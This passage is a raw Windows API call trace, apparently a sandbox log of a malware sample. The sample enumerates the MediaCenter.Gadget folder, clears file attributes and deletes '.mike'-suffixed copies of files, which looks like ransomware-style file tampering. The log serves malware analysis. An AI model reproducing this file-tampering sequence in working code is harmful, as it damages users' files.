dwReserved1=0x0, cFileName="graph_up.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8640abee, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8640abee, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29acc28f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="info.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863e4a91, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x863e4a91, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29af23ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbda, dwReserved0=0x0, dwReserved1=0x0, cFileName="row_over.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862da106, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x862da106, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29af23ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="triangle.png", cAlternateFileName="")) returned 1 [0104.197] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862da106, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x862da106, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29af23ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="triangle.png", cAlternateFileName="")) returned 0 [0104.197] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.197] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.197] CoTaskMemFree (pv=0x506980) [0104.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.199] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8df54c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.199] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0104.199] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa48ceb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x19f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.html", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1cc85b8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8fefd96, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc8fefd96, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x294e, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a59d04, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x9e9e7900, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0xe17d845, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MCESidebarCtrl.dll", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5862, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0104.200] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.206] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html", dwFileAttributes=0x80) returned 0 [0104.212] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\flyout.html.mike")) returned 1 [0104.214] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html", dwFileAttributes=0x80) returned 0 [0104.221] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\main.html.mike")) returned 1 [0104.224] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0104.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html", dwFileAttributes=0x80) returned 0 [0104.231] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\settings.html.mike")) returned 1 [0104.232] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x7693a40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x76b9ba0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.232] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0104.232] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa48ceb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x19f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.html", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1cc85b8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8fefd96, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc8fefd96, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x294e, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a59d04, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x9e9e7900, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0xe17d845, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MCESidebarCtrl.dll", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5862, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0104.233] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5862, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0104.233] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.233] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.233] CoTaskMemFree (pv=0x506980) [0104.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.234] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.234] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8fefd96, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc8fefd96, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf14, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.css", cAlternateFileName="")) returned 1 [0104.234] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fb81591, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x3fb81591, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x19ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.css", cAlternateFileName="")) returned 1 [0104.234] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 [0104.234] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0104.235] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.235] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.235] CoTaskMemFree (pv=0x506980) [0104.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.236] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0104.241] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\en-us\\gadget.xml.mike")) returned 1 [0104.242] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0104.242] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.243] CoTaskMemFree (pv=0x506980) [0104.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0104.253] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mousedown.png", dwFileAttributes=0x80) returned 0 [0104.257] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mousedown.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_left_mousedown.png.mike")) returned 1 [0104.258] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mouseout.png", dwFileAttributes=0x80) returned 0 [0104.262] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mouseout.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_left_mouseout.png.mike")) returned 1 [0104.264] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mouseover.png", dwFileAttributes=0x80) returned 0 [0104.268] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_left_mouseover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_left_mouseover.png.mike")) returned 1 [0104.271] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.275] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mousedown.png", dwFileAttributes=0x80) returned 0 [0104.276] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mousedown.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_mcelogo_mousedown.png.mike")) returned 1 [0104.277] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mouseout.png", dwFileAttributes=0x80) returned 0 [0104.282] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mouseout.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_mcelogo_mouseout.png.mike")) returned 1 [0104.283] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mouseover.png", dwFileAttributes=0x80) returned 0 [0104.290] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_MCELogo_mouseover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_mcelogo_mouseover.png.mike")) returned 1 [0104.292] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_play.png", dwFileAttributes=0x80) returned 0 [0104.296] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_play.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_play.png.mike")) returned 1 [0104.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0104.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mousedown.png", dwFileAttributes=0x80) returned 0 [0104.302] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\button_right_mousedown.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\button_right_mousedown.png.mike")) returned 1 [0104.304] 